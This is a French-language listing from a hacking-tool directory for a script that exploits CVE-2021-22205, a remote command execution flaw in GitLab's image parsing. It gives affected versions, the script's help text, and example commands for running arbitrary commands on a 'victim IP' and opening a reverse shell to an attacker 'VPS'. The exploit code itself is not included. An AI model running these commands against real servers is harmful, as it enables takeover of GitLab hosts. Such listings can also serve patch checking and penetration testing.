Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-22205 — CVE-2021-22205 检测脚本,支持getshell和命令执行 | Kitploit
Outils/GitHubGitHub/keven1z/cve-2021-22205
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubkeven1z/cve-2021-22205

CVE-2021-22205

CVE-2021-22205 检测脚本,支持getshell和命令执行

Voir le dépôt
123il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-22205

En raison d'une validation incorrecte des fichiers image transmis à l'analyseur de fichiers par Gitlab, une exécution de commandes est possible. Un attaquant peut construire une requête malveillante pour exécuter des commandes arbitraires sur le système cible, ce qui conduit finalement au contrôle du serveur Gitlab. Comme la plupart des scripts disponibles en ligne ne proposent pas de reverse shell, j'ai modifié le script existant pour ajouter une fonctionnalité de reverse shell en une seule commande.

Versions affectées

  • 11.9 <= GitLab (CE/EE) < 13.8.8
  • 13.9 <= GitLab (CE/EE) < 13.9.6
  • 13.10 <= GitLab (CE/EE) < 13.10.3

Utilisation

root@kitploit:~
	  ______     _______     ____   ___ ____  _      ____  ____  ____   ___  ____  
	 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \|___ \|___ \ / _ \| ___| 
	| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ 
	| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
 	\____ |  \_/  |_____|   |_____|\___/_____|_|    |_____|_____|_____|\___/|____/ 
    	
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
                         [-p PORT]

GitLab < 13.10.3 RCE

optional arguments:
  -h, --help            affiche ce message d'aide et quitte
  -t TARGET, --target TARGET
                        URL cible
  -c COMMAND, --command COMMAND
                        Commande à exécuter
  --shell               Reverse shell (oui/non)
  -i IP, --ip IP        Adresse IP pour le reverse shell
  -p PORT, --port PORT  Port pour le reverse shell

Exemple

root@kitploit:~
python3 CVE-2021-22205.py -t [IP de la victime] --shell -i [IP du VPS] -p [port du VPS] // reverse shell
python3 CVE-2021-22205.py -t [IP de la victime] -c [commande] // exécution de commande

Déclaration

Ce script est destiné à des fins de test uniquement, ne l'utilisez pas à d'autres fins.

Télécharger l’outil